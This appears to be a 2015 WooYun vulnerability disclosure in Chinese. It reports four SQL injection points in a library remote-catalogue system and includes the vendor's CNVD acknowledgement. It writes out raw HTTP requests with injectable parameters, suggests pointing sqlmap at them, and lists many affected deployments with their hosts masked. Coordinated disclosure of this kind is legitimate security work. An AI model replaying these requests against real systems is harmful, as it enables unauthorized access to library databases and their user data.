当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147291

漏洞标题:某图书远程检索系统四处SQL注射漏洞打包

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-10-18 17:23

修复时间:2016-01-20 15:00

公开时间:2016-01-20 15:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-18: 细节已通知厂商并且等待厂商处理中
2015-10-22: 厂商已经确认,细节仅向厂商公开
2015-10-25: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-16: 细节向核心白帽子及相关领域专家公开
2015-12-26: 细节向普通白帽子公开
2016-01-05: 细节向实习白帽子公开
2016-01-20: 细节向公众公开

简要描述:

隐蔽的注入点

详细说明:

观http://**.**.**.**/bugs/wooyun-2010-086973有感而发


注入点文件:GetRegistInfoAjax.aspx


打开http://**.**.**.**/NTRdrS_RegistInfo.aspx?BookRecno=900021568

1.jpg


POST包如下

..T /GetRegistInfoAjax.aspx?nbibRecno=900021568&nRecno=732140&Year=2015 HTTP/1.1
Accept: */*
Referer: http://**.**.**.**/NTRdrS_RegistInfo.aspx?BookRecno=900021568
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: **.**.**.**
Connection: Keep-Alive


构造一下地址,也可以sqlmap直接跑,
构造的地址为:http://**.**.**.**/GetRegistInfoAjax.aspx?nbibRecno=900021568&nRecno=732140&Year=2015

2.jpg


3.jpg


在来演示一个:http://**.**.**.**:8081/NTRdrS_RegistInfo.aspx?BookRecno=900000848
方法如上 不多说了

GET /GetRegistInfoAjax.aspx?nbibRecno=900000848&nRecno=261022&Year=2015 HTTP/1.1
Accept: */*
Referer: http://**.**.**.**:8081/NTRdrS_RegistInfo.aspx?BookRecno=900000848
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: **.**.**.**:8081
Connection: Keep-Alive


构造地址:http://**.**.**.**:8081/GetRegistInfoAjax.aspx?nbibRecno=900000848&nRecno=261022&Year=2015

4.jpg


5.jpg


最后提供一下案例:

http://**.**.**.**/
**.**.**.**/
**.**.**.**/
**.**.**.**/
http://**.**.**.**:8081/
**.**.**.**/
http://**.**.**.**/
http://**.**.**.**/
**.**.**.**/
**.**.**.**:1000/
**.**.**.**/
**.**.**.**:88/


提供几个供审核参考的案例

**.**.**.**/NTRdrS_RegistInfo.aspx?BookRecno=900004601
**.**.**.**/NTRdrS_RegistInfo.aspx?BookRecno=900008028
http://**.**.**.**/NTRdrS_RegistInfo.aspx?BookRecno=900000021
http://**.**.**.**:8081/NTRdrS_RegistInfo.aspx?BookRecno=900001058
http://**.**.**.**:90/NTRdrS_RegistInfo.aspx?BookRecno=900000336


漏洞证明:


0x02
第二处注入点位于:autodbtj/modifyzdjb.jsp
**.**.**.**:8070/autodbtj/modifyzdjb.jsp做演示

POST /autodbtj/modifyzdjb.jsp HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: **.**.**.**:8070/autodbtj/modifyzdjb.jsp
Accept-Language: zh-CN
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: **.**.**.**:8070
Content-Length: 15
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: JSESSIONID=abc9f-Y6iBRMj85zEfXbv
zwkm=1&bz=1&id=


zwkm参数存在注入

2.jpg


0x03
http://**.**.**.**:8070/
**.**.**.**:8070/
**.**.**.**:8070/
**.**.**.**:8089/
http://**.**.**.**:88/
http://**.**.**.**:8070/
**.**.**.**:8070/
**.**.**.**:8070/
**.**.**.**:8070/
**.**.**.**:8070/
http://**.**.**.**:8089/
**.**.**.**:8086/
http://**.**.**.**:8089/
**.**.**.**:8089/
**.**.**.**:8088/
引爆点位于文件:ggjs/zdzx/dztj.jsp
**.**.**.**:8070/ggjs/zdzx/dztj.jsp做演示

POST /ggjs/zdzx/dztjjg.jsp HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: **.**.**.**:8070/ggjs/zdzx/dztj.jsp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: **.**.**.**:8070
Content-Length: 55
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: JSESSIONID=abc9f-Y6iBRMj85zEfXbv
smxx=null&isbn=&dztm=%27&dzmm=%27&Submit1=%CD%C6+%BC%F6


1.jpg


0x04
位于文件:xk/zdframe.jsp
**.**.**.**:8089/xk/zdframe.jsp演示

POST /xk/zdjs.jsp HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: **.**.**.**:8089/xk/zdsearch.jsp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: **.**.**.**:8089
Content-Length: 56
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: JSESSIONID=abcCW7ela35Xo-svJqSbv
marc=U&year1=2014&year2=2015&path=km&jsc=%A1%AE&button1=


盲注 不过多证明了

1.jpg


2.jpg

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-22 14:51

厂商回复:

CNVD确认所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无